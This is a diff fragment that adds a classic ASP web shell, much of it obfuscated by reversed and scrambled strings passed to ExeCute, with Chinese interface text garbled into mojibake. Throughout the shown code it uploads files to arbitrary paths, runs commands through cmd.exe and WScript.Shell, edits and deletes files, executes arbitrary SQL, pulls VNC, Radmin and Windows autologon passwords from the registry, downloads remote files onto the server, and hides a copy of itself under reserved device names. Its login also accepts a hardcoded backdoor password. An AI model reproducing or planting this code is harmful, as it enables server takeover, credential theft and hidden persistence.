+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
